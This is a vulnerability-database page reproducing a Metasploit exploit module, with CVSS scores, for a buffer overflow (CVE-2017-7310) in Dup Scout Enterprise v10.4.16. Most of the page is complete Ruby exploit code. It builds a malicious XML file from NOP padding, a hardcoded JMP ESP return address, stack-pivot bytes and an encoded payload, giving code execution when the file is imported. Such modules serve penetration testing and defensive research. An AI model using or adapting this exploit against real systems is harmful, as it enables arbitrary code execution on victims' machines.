Lucene search

K
metasploitDaniel TeixeiraMSF:EXPLOIT-WINDOWS-FILEFORMAT-DUPSCOUT_XML-
HistoryJan 24, 2018 - 8:47 p.m.

Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow

2018-01-2420:47:46
Daniel Teixeira
www.rapid7.com
15

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

7.8

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16 by using the import command option to import a specially crafted xml file.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow',
      'Description'     => %q(
        This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16
        by using the import command option to import a specially crafted xml file.
      ),
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Daniel Teixeira'
        ],
      'References'      =>
        [
          [ 'CVE', '2017-7310' ]
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => true
        },
      'Platform'        => 'win',
      'Payload'         =>
        {
          'BadChars' => "\x27",
          'StackAdjustment' => -3500
        },
      'Targets'         =>
        [
          ['Windows Universal', { 'Ret' => 0x651BB77A  } ] # JMP ESP [QtGui4.dll]
        ],
      'Privileged'      => false,
      'DisclosureDate'  => '2017-03-29',
      'DefaultTarget'   => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The file name.', 'msf.xml'])
      ])
  end

  def exploit
    esp = "\x8d\x44\x24\x14" #LEA EAX, [ESP+14h]
    jmp = "\xff\xe0" # JMP EAX

    buf = "<?xml ?><a name='"
    buf << make_nops(1560)
    buf << [target.ret].pack('V')
    buf << make_nops(16)
    buf << esp
    buf << jmp
    buf << make_nops(14)
    buf << payload.encoded

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(buf)
  end
end

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

7.8

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Related for MSF:EXPLOIT-WINDOWS-FILEFORMAT-DUPSCOUT_XML-